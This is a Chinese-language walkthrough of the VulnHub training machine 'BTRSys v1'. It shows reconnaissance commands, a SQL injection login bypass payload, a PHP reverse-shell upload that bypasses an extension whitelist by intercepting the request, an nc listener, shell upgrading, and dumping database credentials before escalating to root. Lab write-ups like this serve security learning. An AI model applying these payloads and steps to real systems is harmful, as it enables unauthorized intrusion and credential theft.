BTRSys: v1靶机
靶机地址:https://www.vulnhub.com/entry/btrsys-v1,195/
靶机难度:初级/中级
arp-scan -l 扫描获取靶机ip:x.x.x.229
nmap -sV -Pn -A x.x.x.229 扫描出80,22,21端口
dirb http://x.x.x.229 -X .php
扫描出config.php,login.php
登录,弱口令,不成功
查看源码
substring就是截取,从“@”符号后一位开始截取到输入的user账号的长度,即从@到结束;且str中必须是btrisk.com
pwd很明显,直接随便构造一个注入
账号:xxx@btrisk.com
密码:' or 1=1 -- -
登录成功,上传文件点
burp截包-上传文件getshell
可以上传,直接上反弹phpshell
白名单写死了,只能是JPG或者PNG,那就将shell.php改成shell.jpg
burp截包,截断将jpg后缀改成php后缀,go,上传成功
在http://x.x.x/uploads/
中可以看到上传的反弹phpshell
在kali中nc -lvp 1234
打开监听,等待反弹
进入交互模式 python -c 'import pty;pty.spawn("/bin/bash")'
进入shell中,到网站根目录看下配置文件config.php
发现数据库密码
$con=mysqli_connect("localhost","root","toor","deneme");
直接登录数据库看看有什么
mysql -u root -p
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| deneme |
| mysql |
| performance_schema |
+--------------------+
4 rows in set (0.00 sec)
mysql> use deneme;
use deneme;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
show tables;
+------------------+
| Tables_in_deneme |
+------------------+
| user |
+------------------+
1 row in set (0.00 sec)
mysql> select * from user
select * from user
-> ;
;
+----+-------------+------------------+-----------+---------+-------------+---------+-------------+--------------+
| ID | Ad_Soyad | Kullanici_Adi | Parola | BabaAdi | BabaMeslegi | AnneAdi | AnneMeslegi | KardesSayisi |
+----+-------------+------------------+-----------+---------+-------------+---------+-------------+--------------+
| 1 | ismail kaya | ikaya@btrisk.com | asd123*** | ahmet | muhasebe | nazli | lokantaci | 5 |
| 2 | can demir | cdmir@btrisk.com | asd123*** | mahmut | memur | gulsah | tuhafiyeci | 8 |
+----+-------------+------------------+-----------+---------+-------------+---------+-------------+--------------+
密码都是:asd123***
直接su root,
总结
1、该靶机的重点在于只给你一个登陆界面,啥信息都没有的情况下,要么爆破,要么注入、绕过。
2、后台上传界面,而且上传后也没有检查文件名,截包绕过白名单限制上传。